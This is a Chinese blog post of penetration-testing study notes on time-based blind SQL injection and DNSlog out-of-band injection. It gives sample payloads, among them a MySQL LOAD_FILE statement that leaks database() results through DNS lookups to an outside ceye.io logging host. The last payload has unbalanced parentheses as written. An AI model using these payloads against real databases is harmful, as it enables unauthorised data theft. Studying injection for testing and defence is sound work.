其他分享
首页 > 其他分享> > 渗透测试 day4

渗透测试 day4

作者:互联网

时间盲注

原理:构造语句,通过页面响应的时长,来判断信息。

方法:构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行

核心语法:

if(left(user(),1)='a',0,sleep(3));

 

 

 

 

Dnslog盲注

dnslog是用户访问网站过程中被dns服务记录的信息

原理: 通过布尔或时间盲注效率很低,需要发送很多的请求进行判断,很可能触发安全设备的防护,我们需要一种方式,减少请求,直接回显数据,这里就使用dnslog实现注入。

 

dnslog平台 :http://ceye.io/

mysql LOAD_FILE函数可以发起请求:

SELECT LOAD_FILE(CONCAT('\\\\','test','.mysql.d1egqb.ceye.io\\abc'));

方法:

构造语句,利用load_file()函数发起请求,使用dnslog接受请求,获取数据

核心语法:

SELECT LOAD_FILE(CONCAT('\\\\',select database()),'.mysql.d1egqb.ceye.io\\abc'));

 

 

 

load_file()函数只能在windows操作系统上使用,linux操作系统不能使用

 

 

标签:语句,LOAD,dnslog,测试,io,渗透,day4,ceye,mysql
来源: https://www.cnblogs.com/liuyuanzzz/p/11679925.html